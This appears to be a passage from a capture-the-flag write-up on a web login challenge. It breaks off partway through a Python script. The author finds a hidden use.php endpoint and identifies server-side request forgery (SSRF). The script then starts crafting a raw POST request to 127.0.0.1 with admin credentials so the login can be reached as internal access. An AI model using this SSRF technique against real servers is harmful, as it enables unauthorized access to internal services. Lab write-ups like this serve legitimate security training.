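First, look at the challenge: the description is empty.
Open the challenge instance and take a look.
you are not an inner user, so we can not let you have identify~ Login is only possible from internal access.
View the page source.
Line 16 contains a comment, <!-- use.php -->. Append use.php to the URL and take a look.
At this point we can tell it is SSRF. First write a payload to achieve internal access.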
import urllib.parse
host = "127.0.0.1:80"
content = "uname=admin&passwd=admin"
content_length = len(content)
test =\
"""POST /index.php HTTP/1.1
Host: {}
User-Agent: curl/7.43.0
Accept: */*
Conte